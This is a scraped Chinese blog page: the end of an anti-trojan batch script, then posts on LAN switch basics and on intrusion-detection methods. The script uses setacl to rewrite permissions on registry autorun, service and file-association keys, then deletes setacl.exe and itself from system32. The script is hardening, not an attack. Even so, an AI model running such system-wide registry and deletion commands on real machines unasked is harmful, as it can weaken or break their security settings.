@setacl machine/SOFTWARE/Microsoft/Windows/CurrentVersion/Run /registry %OP%>nul 2>nul
@setacl machine/SOFTWARE/Microsoft/Windows/CurrentVersion/RunOnce /registry %OP%>nul 2>nul
@setacl machine/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServices /registry %OP%>nul 2>nul
@setacl machine/SOFTWARE/Microsoft/Windows/CurrentVersion/RunEX /registry %OP%>nul 2>nul
@setacl machine/SOFTWARE/Microsoft/Windows/CurrentVersion/RunOnceEX /registry %OP%>nul 2>nul
@setacl machine/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServicesEx /registry %OP%>nul 2>nul
@rem HKCU
@setacl CURRENT_USER/SOFTWARE/Microsoft/Windows/CurrentVersion/Run /registry %OP%>nul 2>nul
@setacl CURRENT_USER/SOFTWARE/Microsoft/Windows/CurrentVersion/RunOnce /registry %OP%>nul 2>nul
@setacl CURRENT_USER/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServices /registry %OP%>nul 2>nul
@setacl CURRENT_USER/SOFTWARE/Microsoft/Windows/CurrentVersion/RunEX /registry %OP%>nul 2>nul
@setacl CURRENT_USER/SOFTWARE/Microsoft/Windows/CurrentVersion/RunOnceEX /registry %OP%>nul 2>nul
@setacl CURRENT_USER/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServicesEx /registry %OP%>nul 2>nul
@setacl CURRENT_USER/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServicesOnce /registry %OP%>nul 2>nul
@rem USERS
@setacl USER/SOFTWARE/Microsoft/Windows/CurrentVersion/Run /registry %OP%>nul 2>nul
@setacl USER/SOFTWARE/M
icrosoft/Windows/CurrentVersion/RunOnce /registry %OP%>nul 2>nul
@setacl USER/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServices /registry %OP%>nul 2>nul
@setacl USER/SOFTWARE/Microsoft/Windows/CurrentVersion/RunEX /registry %OP%>nul 2>nul
@setacl USER/SOFTWARE/Microsoft/Windows/CurrentVersion/RunOnceEX /registry %OP%>nul 2>nul
@setacl USER/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServicesEx /registry %OP%>nul 2>nul
@setacl USER/SOFTWARE/Microsoft/Windows/CurrentVersion/RunServicesOnce /registry %OP%>nul 2>nul
@rem Services
@setacl MACHINE/SYSTEM/CurrentControlSet/Services /registry %OP%>nul 2>nul
@rem CLASSES_ROOT
@setacl CLASSES_ROOT/exefile/shell/open/command /registry %OP%>nul 2>nul
@setacl CLASSES_ROOT/inifile/shell/open/command /registry %OP%>nul 2>nul
@setacl CLASSES_ROOT/txtfile/shell/open/command /registry %OP%>nul 2>nul
@setacl CLASSES_ROOT/comfile/shell/open/command /registry %OP%>nul 2>nul
@setacl CLASSES_ROOT/batfile/shell/open/command /registry %OP%>nul 2>nul
@setacl CLASSES_ROOT/inffile/shell/open/command /registry %OP%>nul 2>nul
@echo 正在更新帐户策略、审核策略......
@REM [刷新本地安全策略]
@%UpdatePolicy%>nul 2>nul
@echo 帐户策略、审核策略更新完成
:complete
@echo 操作完成
@echo.
@echo.
@echo 请按任意键退出。
@pause>nul 2>nul
:quit
@rem Clear
@del %systemroot%/system32/setacl.exe>nul 2>nul
@del %systemroot%/system32/AntiTrojanhorse.bat>nul 2>nul
@ENDLOCAL
分类 : 技术文摘 | 发表时间 14-06-2006
许多新型的Client/Server应用程序以及多媒体技术的出现,导致了传统 的共享式网络远远不能满足要求,这也就推动了局域网交换机的出现。
1、交换机的定义
局域网交换机拥有许多端口,每个端口有自己的专用带宽,并且可以连接不同的网段。交换机各个端口之间的通信是同时的、并行的,这就大大提高了信息吞吐量。为了进一步提高性能,每个端口还可以只连接一个设备。
为了实现交换机之间的互连或与高档服务器的连接,局域网交换机一般拥有一个或几个高速端口,如100M以太网端口、FDDI端口或155M ATM端口,从而保证整个网络的传输性能。
2、交换机的特性
通过集线器共享局域网的用户不仅是共享带宽,而且是竞争带宽。可能由于个别用户需要更多的带宽而导致其他用户的可用带宽相对减少,甚至被迫等待,因而也就耽误了通信和信息处理。利用交换机的网络微分段技术,可以将一个大型的共享式局域网的用户分成许多独立的网段,减少竞争带宽的用户数量,增加每个用户的可用带宽,从而缓解共享网络的拥挤状况。由于交换机可以将信息迅速而直接地送到目的地能大大提高速度和带宽,能 保护用户以前在介质方面的投资,并提供良好的可扩展性,因此交换机不但是网桥的理想替代物,而且是集线器的理想替代物。
与网桥和集线器相比,交换机从下面几方面改进了性能:
(1)通过支持并行通信,提高了交换机的信息吞吐量。
(2)将传统的一个大局域网上的用户分成若干工作组,每个端口连接一台设备 或连接一个工作组,有效地解决拥挤现像。这种方法人们称之为网络微分 段(Micro一segmentation)技术。
(3)虚拟网(VirtuaI LAN)技术的出现,给交换机的使用和管理带来了更大 的灵活性。我们将在后面专门介绍虚拟网。
(4)端口密度可以与集线器相媲美,一般的网络系统都是有一个或几个服务器,而绝大部分都是普通的客户机。客户机都需要访问服务器,这样就导致服务器的通信和事务处理能力成为整个网络性能好坏的关键。
交换机就主要从提高连接服务器的端口的速率以及相应的帧缓冲区的大小,来提高整个网络的性能,从而满足用户的要求。一些高档的交换机还采用全双工技术进一步提高端口的带宽。以前的网络设备基本上都是采用半双工的工作方式,即当一台主机发送数据包的时候, 它就不能接收数据包,当接收数据包的时候,就不能发送数据包。由于采用全双工技术,即主机在发送数据包的同时,还可以接收数据包,普通的10M端口就可以变成20M端口,普通的100M端口就可以变成200M 端口,这样就进一步提高了信息吞吐量。
3、交换机的工作原理
传统的交换机本质上是具有流量控制能力的多端口网桥,即传统的(二层) 交换机。把路由技术引入交换机,可以完成网络层路由选择,故称为三层交换,这是交换机的新进展。交换机(二层交换)的工作原理交换机和网桥一样,是工作在链路层的联网设备,它的各个端口都具有桥接功能,每个端口可以连接一个LAN或一台高性能网站或服务器,能够通过自学习来了解每个端口的设备连接情况。所有端口由专用处理器进行控制,并经过控制管理总线转发信息。
同时可以用专门的网管软件进行集中管理。 除此之外,交换机为了提高数据交换的速度和效率,一般支持多种方式。
(1)存储转发:
所有常规网桥都使用这种方法。它们在将数据帧发柱其他端口之前,要把收到的帧完全存储在内部的存储器中,对其检验后再发往其他端口,这样其延时等于接收一个完整的数据帧的时间及处理时间的总和。如果级联很长时,会导致严重的性能问题,但这种方法可以过滤掉错误的数据帧。
(2)切入法:
这种方法只检验数据帧的目标地址,这使得数据帧几乎马上就 可以传出去,从而大大降低延时。
其缺点是:错误帧也会被传出去。错误帧的概率较小的情况下,可以采用切入法以提高传输速度。而错误帧的概率较大的情况下,可以采用存储转发法/以减少错误帧的重传。
4、交换机的配置
我们下面以Cisco公司的Catlystl900交换机为例,介绍交换机的一般配置过程。
对一台新的Catlystl900交换机,使用它的缺省配置就可以工作了。这因为它是一种将软件装在FlashMemory中的硬件设备,当加电时,它首先要进行一系列自检,对所有端口进行测试之后,交换机就处于工作状态。这时它的交换表是空的,它可以通过自学习来了解各个端口的设备连接情况,并将设备的 MAC地址记录在交换表中,当有信息交换时,交换机就根据交换表来进行数据转发。
但为了便于对它进行网络管理,Catlystl900交换机自己有一个MAC地址,这样就可以为它分配一个IP地址和屏蔽码。网络管理员须通过交换机的串口接一台终端或仿真终端,才能为它指定一个IP地址,其缺省值是0.0.0.0。指定IP地址以后,网络管理员就可以通过网络进行远程管理了。Catlystl900交换机的配置界面是菜单形式,缺省配置下,它的所有端口都属于同一个VLAN,很多情况下都不需要作什么修改。
(1)将微机串口通过RS一232电缆与Cata1yst1900的Console口连接,运行仿真终端软件,Catalyst 1900 启动后。
(2)回车后,进入主菜单:
(3)按“S”键,进入系统配置菜单:(配置系统名,位置,日期)
(4)在主菜单中按“N”键进入网络管理菜单
(5)配置IP地置
(6)配置SNMP参数
5、交换机的种类
交换机是数据链路层设备,它可将多个物理LAN网段连接到一个大型网络上,与网络类似交换机传输和溢出也是基于MAC地址的传输。由于交换机是用硬件实现的,因此,传输速度很快。传输数据包时,交换机要么使用存储—转发交换方式,要么使用断—通交换方式。目前有许多类型的交换机,其中包括ATM交换机,LAN交换机和不同类型的WAN交换机。
ATM交换机
ATM(Asynchronous Transfer Mode)交换机为工作组,企业网络中枢以及其它众多领域提供了高速交换信息和可伸缩带宽的能力。ATM交换机支持语音,视频和文本数据应用,并可用来交换固定长度的信息单位(有时也称元素)。企业网络是通过ATM中枢链路连接多个LAN组成的。
局域网交换机
LAN交换机用于多LAN网段的相互连接,它在网络设备之间进行专用的无冲突的通信,同时支持多个设备间的对话。LAN交换机主要是用于高速交换数据帧。通过LAN交换机将一个0Mbps以太网与一个100Mbps 以太网互联。
分类 : 系统安全 | 发表时间 13-06-2006
信息来源:BackLi’blog
保证信息系统安全的经典手段是“存取控制”或“访问控制”,但无论在理论上还是在实践中,这种手段都不能彻底填补一个系统的安全漏洞,也还没有一种切实可行的办法解决合法用户在通过“身份鉴别”或“身份认证”后滥用特权的问题。攻击检测技术就像治安巡逻队,专门注重于发现形迹可疑者。
计算机网络技术的发展和应用对人类生活方式的影响越来越大。通过Internet网连接到几乎世界上任何一台计算机。因此,传统的安全域的概念也已经发生了深刻的变化,边界变得模糊了,网络系统管理员再也不能满足于守住安全边界了;也不再有信心保护敏感信息万无一失。越来越多的证据表明计算机信息系统的安全性是十分脆弱的。基于计算机、网络的信息系统的安全问题已经成为非常严重的问题。
一、存取控制与攻击检测:站岗与巡逻
保证信息系统安全的经典手段是“存取控制”或“访问控制”,这种手段在经典的以及现代的安全理论中都是实行系统安全策略的最重要的手段。但迄今为止,软件工程技术还没有达到A2级所要求的形式生成或证明一个系统的安全体系的程度,所以不可能百分之百地保证任何一个系统(尤其是底层系统)中不存在安全漏洞。而且,无论在理论上还是在实践中,试图彻底填补一个系统的安全漏洞都是不可能的,也还没有一种切实可行的办法解决合法用户在通过“身份鉴别”或“身份认证”后滥用特权的问题。打个比方,经典的安全体系就像一座城池,身份认证就好像进城时的查路条一样,着重点在于防范奸细混入;但是这种措施对于城池的安全仍是远远不够的。
攻击检测作为其他经典手段的补充和加强,是任何一个安全系统中不可或缺的最后一道防线;攻击检测可以分为被动、非在线地发现和实时、在线地发现计算机网络系统中的攻击者两种方法。从大量非法入侵或计算机盗窃案例可以清晰地看到,计算机系统的最基本防线“存取控制”或“访问控制”,在许多场合不是防止外界非法入侵和防止内部用户攻击的绝对无懈可击的屏障。大量攻击成功的案例是由于系统内部人员不恰当地或恶意地滥用特权而导致的。攻击检测技术则类似于治安巡逻队,专门注重于发现形迹可疑者,信息系统的攻击者很有可能通过了城门的身份检查,或者爬越了城墙而混入城中;这时要想进一步加强信息系统的安全强度,就需要增派一支巡逻队,专门负责检查在城市中鬼鬼祟祟行动可疑的人员。
攻击检测提供了一种机制,对合法用户而言能够在一定程度上使他们为其失误或非法行为负责,从而增强他们的责任感。对非法进入的攻击者而言则意味着增强了纠察力度,行使着公安局、检察院的职责。攻击检测具有最后防线性质的防范能力,或许是用来发现合法用户滥用特权的唯一方法,而且完善的攻击检测还能用具有法律效力的方式证明一个受到怀疑的人是否有罪。
早期中大型的计算机系统中都收集审计信息来建立跟踪文件,这些审计跟踪的目的多是为了性能测试或计费,因此对攻击检测提供的有用信息比较少。
二、攻击检测技术
1.攻击分类
在信息系统中,一般至少应当考虑如下三类安全威胁:外部攻击、内部攻击和行为滥用。攻击者来自该计算机系统的外部时称作外部攻击;当攻击者就是那些有权使用计算机,但无权访问某些特定的数据、程序或资源的人企图越权使用系统资源时视为内部攻击,包括假冒者(即那些使用其他合法用户的身份和口令的人)、秘密使用者(即那些有意逃避审计机制和存取控制的人员);特权滥用者也是计算机系统资源的合法用户,表现为有意或无意地滥用他们的特权。
通过审计试图登录的失败记录可以发现外部攻击者的攻击企图;通过观察试图连接特定文件、程序和其他资源的失败记录可以发现内部攻击者的攻击企图,如可通过比较为每个用户单独建立的行为模型和特定的行为来检测发现假冒者;但要通过审计信息来发现那些权利滥用者往
往是很困难的。
基于审计信息的攻击检测特别难于防范具备较高优先特权的内部人员的攻击,因为攻击者可通过使用某些系统特权或调用比审计本身更低级的操作来逃避审计。对于那些具备系统特权的用户,需要审查所有关闭或暂停审计功能的操作,通过审查被审计的特殊用户、或者其他的审计参数来发现。审查更低级的功能,如审查系统服务或核心系统调用通常比较困难,通用的方法很难奏效,需要专用的工具和操作才能实现。总之,为了防范隐秘的内部攻击需要在技术手段以外确保管理手段行之有效,技术上则需要监视系统范围内的某些特定的指标(如CPU、内存和磁盘的活动),并与通常情况下它们的历史记录进行比较,以期发现之。
2.攻击检测技术分类
基于计算机系统审计跟踪信息设计和实现的系统安全自动分析或检测工具是最为自然朴素的攻击检测技术。可以从审计系统筛选出涉及安全的信息。其思路与流行的数据挖掘(Data Mining)技术极其类似。
基于审计的自动分析检测工具可以是脱机的,也可以是联机或在线的。分析工具实时地对审计跟踪文件提供的信息进行同步处理,当有可疑的入侵行为时,系统提供实时的警报,在攻击发生时就能提供攻击者的有关信息。
对于信息系统安全强度而言,联机或在线的攻击检测是比较理想的,能够在案发现场及时发现攻击行为,有利于及时采取对抗措施,使损失降低到最低限度。同时也为抓获攻击犯罪分子提供有力的证据。但是,联机的或在线的攻击检测系统所需要的系统资源,几乎随着系统内部活动数量的增长呈几何级数增长。
3.攻击检测方法
(1)基于审计的攻击检测
基于审计信息的攻击检测工具以及自动分析工具可以向系统安全管理员报告计算机系统活动的评估报告,通常是脱机的、滞后的。
对攻击的实时检测系统的工作原理是基于对用户历史行为的建模,以及在早期的证据或模型的基础之上。审计系统实时地检测用户对系统的使用情况,根据系统内部保持的用户行为的概率统计模型进行监测,当发现有可疑的用户行为发生时,保持跟踪并监测该用户的行为。
系统应具备处理自适应的用户参数的能力。能够判断使用行为的合法或可疑。系统应当能够避免“肃反扩大/缩小化”的问题。这种办法同样适用于检测程序的行为以及对数据资源(如文件或数据库)的存取行为。
(2)基于神经网络的攻击检测技术
如上所述,基于审计统计数据的攻击检测系统,具有一些天生的弱点,因为用户的行为可以是非常复杂的,所以想要准确匹配一个用户的历史行为和当前的行为是相当困难的。错发的警报往往来自于对审计数据的统计算法所基于的不准确或不贴切的假设。SRI的研究小组利用和发展神经网络技术来进行攻击检测。神经网络可能用于解决传统的统计分析技术所面临的以下几个
问题:
●难于建立确切的统计分布
●难于实现方法的普适性
●算法实现比较昂贵
●系统臃肿难于剪裁
目前,神经网络技术提出了对基于传统统计技术的攻击检测方法的改进方向,但尚不十分成熟,所以传统的统计方法仍将继续发挥作用,也仍然能为发现用户的异常行为提供相当有参考价值的信息。
(3)基于专家系统的攻击检测技术
进行安全检测工作自动化的另外一个值得重视的研究方向就是基于专家系统的攻击检测技术,即根据安全专家对可疑行为的分析经验来形成一套推理规则,然后再在此基础之上构成相应的专家系统。由此专家系统自动进行对所涉及的攻击操作的分析工作。
所谓专家系统是基于一套由专家经验事先定义的规则的推理系统。例如,在数分钟之内某个用户连续进行登录,且失败超过三次就可以被认为是一种攻击行为。类似的规则在统计系统似乎也有,同时应当说明的是基于规则的专家系统或推理系统也有其局限性,因为作为这类系统的基础的推理规则一般都是根据已知的安全漏洞进行安排和策划的,而对系统的最危险的威胁则主要是来自未知的安全漏洞。实现一个基于规则的专家系统是一个知识工程问题,而且其功能应当能够随着经验的积累而利用其自学习能力进行规则的扩充和修正。
(4)基于模型推理的攻击检测技术
攻击者在入侵一个系统时往往采用一定的行为程序,如猜测口令的程序,这种行为程序构成了某种具有一定行为特征的模型,根据这种模型所代表的攻击意图的行为特征,可以实时地检测出恶意的攻击企图,尽管攻击者并不一定都是恶意的。用基于模型的推理方法人们能够为某些行为建立特定的模型,从而能够监视具有特定行为特征的某些活动。根据假设的攻击脚本,这种系统就能检测出非法的用户行为。一般为了准确判断,要为不同的入侵者和不同的系统建立特定的攻击脚本。
当有证据表明某种特定的攻击模型发生时,系统应当收集其他证据来证实或者否定攻击的真实,以尽可能的避免错报。
为了防止过多的不相干信息的干扰,用于安全目的的攻击检测系统在审计系统之外一般还配备适合系统安全策略的信息采集器或过滤器。同时,还应当充分利用来自其它信息源的信息。在某些系统内可以在不同的层次进行审计跟踪。如有些系统的安全机制中采用三级审计跟踪,包括审计操作系统核心调用行为的跟踪、审计用户和操作系统界面级行为的跟踪、和审计应用程序内部行为的跟踪。
总之,和经典安全措施相同,任何一种攻击检测措施都不能视之为一劳永逸的,必须配合有效的管理和组织措施,形成立体的和纵深有序的安全防御体系。
© All Rights Reserved. 林网博客
Powered by : Wordpress | Designed by : WebDesignLessons.com |
